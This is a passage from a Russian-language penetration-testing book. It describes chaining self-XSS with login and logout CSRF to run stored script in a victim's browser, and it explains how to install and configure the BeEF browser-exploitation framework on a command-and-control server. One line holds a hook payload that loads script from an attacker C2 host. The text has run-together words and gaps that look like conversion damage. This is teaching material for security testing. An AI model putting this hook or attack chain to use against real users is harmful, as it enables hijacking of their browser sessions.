ля почтового приложения. Мы могли бы обновить свое имя, чтобы отразить полезную нагрузку. Поскольку мы не можем влиять на имена профилей других пользователей,эта полезная нагрузка сработаеттолько для нашей учетной записи. Это называется self-XSS-атака. Если одно и то же приложение также уязвимо для CSRF-атак на странице как входа, так и выхода, можно заставить пользователя выйти из системы, а также заставить его войти в систему под именем другого пользователя.

Прежде всего мы могли бы отправить полезную нагрузку XSS в собственное имяпрофиляисохранитьеенапотом.Затемможемсоздатьвредоносныйсайт, который выполняет следующие операции по порядку:

1)использует межсайтовую подделку запроса, чтобы заставить жертву выйти­ из приложения;

2)использует межсайтовую подделку запроса для входа жертвы обратно с применением наших учетных данных;

3)использует межсайтовую подделку запроса для перехода на страницу профиля приложения, содержащую вредоносный код;

4)выполняет вредоносный код в браузере жертвы.

Вредоносный код будет выглядеть примерно так:

Рис.9.8. Вредоносный код self-,XSS-и CSRF-атак

http://email.site/profile/ содержит код self-XSS, который мы сохранили ранее и который будетвыполняться на ничего не подозревающем объекте атаки после загрузки iframe.

Что можно сделать с кодом JavaScript, работающим в браузере жертвы, но в рамках сеанса учетной записи? Воровать куки-файлы сеанса не имеет смысла, но у нас есть другие варианты.

BeEF

В большинстве случаев XSS-уязвимость трудно эксплуатировать успешно. Когда я говорю о практических атаках на стороне клиента, я не имею в виду скриншот всплывающего окна alert(1) для отчета!

Во время выполнения задания XSS-уязвимость может стать жизнеспособнымспособоматаковатьпользователейизакрепитьсявсети.ПроведениеXSS-

…и многое другое.

ЧтобыэксплуатироватьклиентаспомощьюBeEF,нужнопойматьегопосредством XSS-атаки или поразить клиентский код приложения, используя бэкдор. Вредоносный код JavaScript будет выполнен и загрузит ловушку из нашего ко- мандно-контрольного сервера BeEF, предоставляя нам доступ для выполнения дополнительного кода,упакованного внутри BeEF в качестве команд.

Установить BeEF просто. Он доступен на GitHub на странице https://github.com/beefproject/beef. BeEF также есть в Kali Linux по умолчанию,хотя в некоторых случаях лучше,если он будет работать на вашем командно-контрольном сервере в облаке.

Мы можем клонировать последнюю версию из репозитория GitHub с по­ мощью команды git clone.

root@spider-c2:~# git clone https://github.com/beefproject/beef

Исходный код поставляется со скриптом install,который настроит среду за нас. Выполните его в папке beef.

root@spider-c2:~/beef# ./install

[WARNING] This script will install BeEF and its required dependencies (including operating system packages).

true, поскольку это увеличивает шансы на успех.

Если попытаемся внедрить нашу полезную нагрузку BeEF <script async src = http://c2.spider.ml/hook.js> на страницу,загруженную по протоко-

луHTTPS,современныебраузерывообщенебудутзагружатьсценарий.Загруз- каHTTPS-ресурсовнаHTTP-сайтразрешена,поэтому,есливозможно,команд- но-контрольный сервер всегда должен работать с включенным TLS.

Параметры конфигурации beef.https.key и beef.https.cert должны указывать на соответствующий сертификат, желательно подписанный доверенным корневым центром сертификации,таким как Let’s Encrypt. Мы рассмат­ ривали использование Let’s Encrypt для запроса бесплатных сертификатов в главе 6 «Обнаружение и эксплуатация уязвимостей в приложениях с помощью внешних сервисов».

Let’s Encrypt предоставляет бесплатные сертификаты с проверкой домена для имен хостов и даже сертификаты с поддержкой поддоменов.Дополнительную информацию можно найти на станице

https://letsencrypt.org.

Значение beef.http.public должно соответствовать домену с HTTPSсертификатом, иначе могут возникнуть ошибки при валидации клиента и перехват завершится неудачно.

Когда все будет настроено, можно запустить серверный компонент.